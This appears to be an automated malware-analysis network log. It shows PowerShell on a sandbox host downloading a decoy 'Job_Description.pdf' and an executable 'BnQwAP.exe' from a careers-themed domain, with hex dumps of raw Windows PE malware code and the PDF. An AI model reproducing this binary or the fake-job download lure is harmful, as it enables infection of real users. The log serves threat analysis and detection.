                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                                                                  Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                                                                  Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                                                                  Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                                                                  Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b
                                                                                                                  Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50
                                                                                                                  Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;|g7K;~+;~3u(;u$K8M!}EQZMP
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                                                                  Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                                                                  Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.849708147.45.49.1554433800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:08:00 UTC88OUTGET /Job_Description.pdf HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:08:00 UTC430INHTTP/1.1 200 OK
                                                                                                                  etag: "347816-67604c7c-2538f;;;"
                                                                                                                  last-modified: Mon, 16 Dec 2024 15:51:24 GMT
                                                                                                                  content-type: application/pdf
                                                                                                                  content-length: 3438614
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:08:00 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:08:00 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 2e 36 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 35 32 36 35 34 39 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 46 69 6c 74 65 72 20 2f 44 43 54 44 65 63 6f 64 65 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 57 69 64 74 68 20 32 34 38 30 0a 2f 48 65 69 67 68 74 20 33 35 30 38 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a ff d8 ff e1 16 2b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07
                                                                                                                  Data Ascii: %PDF-1.6%1 0 obj<</Type /Catalog/Version /1.6/Pages 2 0 R>>endobj6 0 obj<</Length 526549/Type /XObject/Subtype /Image/Filter /DCTDecode/BitsPerComponent 8/Width 2480/Height 3508/ColorSpace /DeviceRGB>>stream+ExifMM*
                                                                                                                  2024-12-23 06:08:00 UTC16384INData Raw: 2f 70 64 66 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 39 35 37 38 37 34 37 33 34 39 30 45 42 31 31 39 36 45 42 45 35 33 46 34 33 36 44 30 45 36 31 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 31 2d 30 33 2d 32 39 54 31 30 3a 31 32 3a 35 37 2b 30 38 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22
                                                                                                                  Data Ascii: /pdf"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:695787473490EB1196EBE53F436D0E61" stEvt:when="2021-03-29T10:12:57+08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a b4 71 57 a7 79 06 42 f6 86 bd 8e 2a a5 e7 f8 b9 5b 86 a5 69 df 15 79 aa 74 c5 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 aa d6 30 7a f3 a2 d6 94 61 8a bd ae dc 52 35 1e 0a 31 57 9b fe 63 ff 00 bd f1 ff 00 ab 98 59 b9 bd 57 65 fd 05 8b e5 0e d9 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa 65 e5 ef f7 b1 3f d6 c9 c3 9b 8b aa fa 0b d6 ee bf b8 6f f5 4f ea cd 81 78 d8 7d 4f 1a d4 3f bf 6f 99 cd 69 e6 f7 18 be 94 3e 06 c7 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ac ef f2 d2 62 eb 32 f8 66 56 02 f3 fd ab 1a a4 fb ce df f1 c6 ba ff 00 8c 67 32 9e 7d f2 45 bf d8 fa 4f eb c5 55 71 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 55 ad db e6 31 57 d2 5f 93 f7 4b 3e 97 f0 fe c9 a6 2a 92 7e 7a d8 7a b6 e9
                                                                                                                  Data Ascii: v*UWb]qWyB*[iytWb]v*UWb0zaR51WcYWeWb]v*Ue?oOx}O?oi>b]v*UWbb2fVg2}EOUqWb]v*UU1W_K>*~zz
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: f4 67 72 c6 24 52 8d d0 e6 5b ce be 59 fc c8 d2 9f 4f d6 e7 04 52 22 7e 1c 55 8d 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ad 1f e3 8a be 85 fc 8e ff 00 8e 63 ff 00 ad 8a a4 bf 9f 9d 21 f9 62 af 14 5e 98 ab 78 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa eb 5f f7 aa 0f f8 ca bf af 15 7d 87 a7 7f bc d1 7f a8 bf ab 15 79 1f e7 5d 81 37 29 75 4d 82 d2 b9 ae d4 8d ed ed fb 03 27 a4 c5 e6 03 71 98 2f 58 5d 8a 1d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 59 a7 e5 2d 93 5d ea 6d c7 f6 37 39 93 a7 16 5d 1f 6d 64 e0 c7 ef 7b f0 1b 53 36 cf 9c bc 23 f3 7b 46 6b 7d 4c de 81 48 d8 66 ab 51 1a 36 fa 17 62 67 e2 c7 c1 d5 82 66 2b d0 bb 14 3b 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5a 6e 98 a4 3d 9f f2 57 fd e7 97 36 5a 67 87 ed ef a8 3d 22 ea dd 6e 63 68 5f 75 61
                                                                                                                  Data Ascii: gr$R[YOR"~Ub]v*UWbc!b^xWb]v*U_}y]7)uM'q/X]v*UWbY-]m79]md{S6#{Fk}LHfQ6bgf+;v*UWbZn=W6Zg="nch_ua
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a a1 35 14 aa 72 c5 52 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa 2f 4e 4e 4e 4e 2a 99 b7 4c 55 26 b8 fb 67 15 52 c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a a3 f4 bf da c5 51 37 bf dc bf cb 01 6c c7 cc 31 04 e9 98 ee e4 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5c 71 56 43 a1 7f 74 72 e8 ba cd 47 36 b5 df ee f0 49 3a 7e 6c 79 7a 65 4e c9 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 cb f6 97 e6 31 41 e4 cc a3 fb 23 e5 99 0e 90 f3 62 1f 98 76 3c ad be b2 37 2b b6 14 3c e9 7a 0c 55 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 95 fe 5d 59 fa b7 4e ec 3e 10 36 c5 5e 89 77 fd cb ff 00 aa 71 57 8b df ff 00 7e df 33 8a a8 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab
                                                                                                                  Data Ascii: b]v*UWb]5rRUWb]v*U/NNNN*LU&gR]v*UWb]Q7l1]v*UWb\qVCtrG6I:~lyzeNUWb]v*U1A#bv<7+<zUUWb]v*U]YN>6^wqW~3b]v*U
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: f7 8e 5f f5 0f ea c5 5f 25 6b 7f ef 64 9f eb 1f d7 8a a0 f1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 56 47 f9 77 a0 3e b5 ab 44 14 72 85 0f c7 8a be a6 b6 b7 4b 78 d6 28 c5 15 45 00 c5 52 bf 38 7f c7 26 e7 fe 31 9c af 27 d2 5c ed 0f f7 b1 fe b3 e6 0b 7f b3 f4 9c d2 3e af 2e 6a 98 b0 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 14 b3 ef ca 1f 2d 9b eb c1 a9 30 ac 51 ed f4 e6 5e 9e 16 6d e7 3b 6f 55 e1 c3 c3 fe 29 3d d4 0a 6c 33 68 f9 fb 1b fc c0 d2 ce a3 a4 cd 1a 0a c9 4d b2 9c d1 b8 bb 4e cd cd e1 e5 04 f2 7c e0 62 30 31 85 fe d2 6c 73 4d 54 fa 7d f1 6e 1d 8a 1d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae 38 a5 9d fe 51 68 86 ef 50 6b 87 1f bb e3 99 5a 78 d9 b7 9e ed bd 47 06 3e 11 f5 3f ff d5 f5 26 04 bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a
                                                                                                                  Data Ascii: __%kdWb]v*UVGw>DrKx(ER8&1'\>.jv*UWb]-0Q^m;oU)=l3hMN|b01lsMT}nv*UWb8QhPkZxG>?&v*UWb]v*
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: 75 46 2a d7 31 e3 8a a2 ad 74 db 9b a2 04 28 58 1e e3 15 67 1e 5c f2 2a c3 49 ee fe 23 d7 8f 86 2a cc e3 8d 63 50 aa 28 06 2a bb 15 76 2a ec 55 8e f9 9f ca a9 aa a9 92 3f 86 50 3a e5 39 31 f1 3b 3d 26 b0 e1 34 7e 97 9b 5f 69 93 d8 b1 49 94 80 3b e6 19 89 0f 51 8f 2c 72 0b 08 50 e0 f4 39 16 ea 75 71 43 75 c5 5d 5c 55 d5 c5 5a 2c 07 53 8a 69 5a da d2 6b a3 c6 05 2d f2 c2 05 b5 ce 62 1c de 83 e5 4f 27 ad a0 17 37 23 93 9d c0 3d b3 2f 1e 3a dc bc de b3 5d c7 e9 8b 2e cc 87 4c a7 70 85 e3 65 1d 48 23 01 65 13 45 e3 9a e5 ab 5a 5d 34 72 75 a9 cd 74 85 17 b7 d3 cf 8e 36 10 55 c8 b7 ba b8 ab ab 8a ba b8 ab ab 8a ba b8 ab ab 8a ba b8 ab ab 8a ad 66 00 6f 8a 40 7a 4f e5 fd b3 c7 03 3b 0a 06 e9 99 98 46 cf 2f da 52 06 54 9b 79 b6 d5 ee f4 bb 88 23 15 77 42 00 cc 87
                                                                                                                  Data Ascii: uF*1t(Xg\*I#*cP(*v*U?P:91;=&4~_iI;Q,rP9uqCu]\UZ,SiZk-bO'7#=/:].LpeH#eEZ]4rut6Ufo@zO;F/RTy#wB
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: ed 5f 0c 55 e9 56 d7 29 70 82 58 8d 54 f7 c5 55 71 57 62 ae c5 5d 8a b1 bf 31 f9 c2 1d 35 0a c5 f1 c9 d2 83 b6 2a f3 8b fd 56 e3 50 62 d7 0d c8 1e 83 15 42 05 03 a6 2a de 2a ec 55 d8 ab b1 57 62 ad 36 2a f4 3f cb 9f ee a4 c5 59 9e 2a ec 55 a6 60 a0 b3 6c 06 29 02 d8 6f 99 bc ec b0 03 05 a6 ed fc c3 31 a7 96 b9 3b bd 26 83 8b 79 30 3b bb b9 6f 1b 95 c3 72 39 8a 4d bd 0c 20 21 f4 a9 01 4c 0c dd 8a bb 15 76 2a ec 55 d8 ab 47 b7 cf 15 7a c7 93 ff 00 de 31 99 f8 f9 3c 7e bb eb 4f 72 d7 5e c2 7c e7 e6 cf 43 fd 12 d4 fc 47 62 47 6c c6 c9 92 b6 0e f7 41 a3 e2 f5 49 80 92 58 f3 73 56 3d 4e 62 3d 1f 2d 83 b1 57 62 ae c5 5d 8a bb 15 76 2a e2 2b d7 15 4d 34 0d 7e 6d 26 51 43 58 89 dc 65 90 9f 0b 89 a9 d3 0c c3 fa 4f 57 d3 af e3 be 85 67 88 d4 1c ce 89 b7 8f cb 8c e3
                                                                                                                  Data Ascii: _UV)pXTUqWb]15*VPbB**UWb6*?Y*U`l)o1;&y0;or9M !Lv*UGz1<~Or^|CGbGlAIXsV=Nb=-Wb]v*+M4~m&QCXeOWg
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a
                                                                                                                  Data Ascii: UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*
                                                                                                                  2024-12-23 06:08:01 UTC16384INData Raw: 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76
                                                                                                                  Data Ascii: *UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.849713147.45.49.1554433800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:08:08 UTC55OUTGET /BnQwAP.exe HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  2024-12-23 06:08:09 UTC439INHTTP/1.1 200 OK
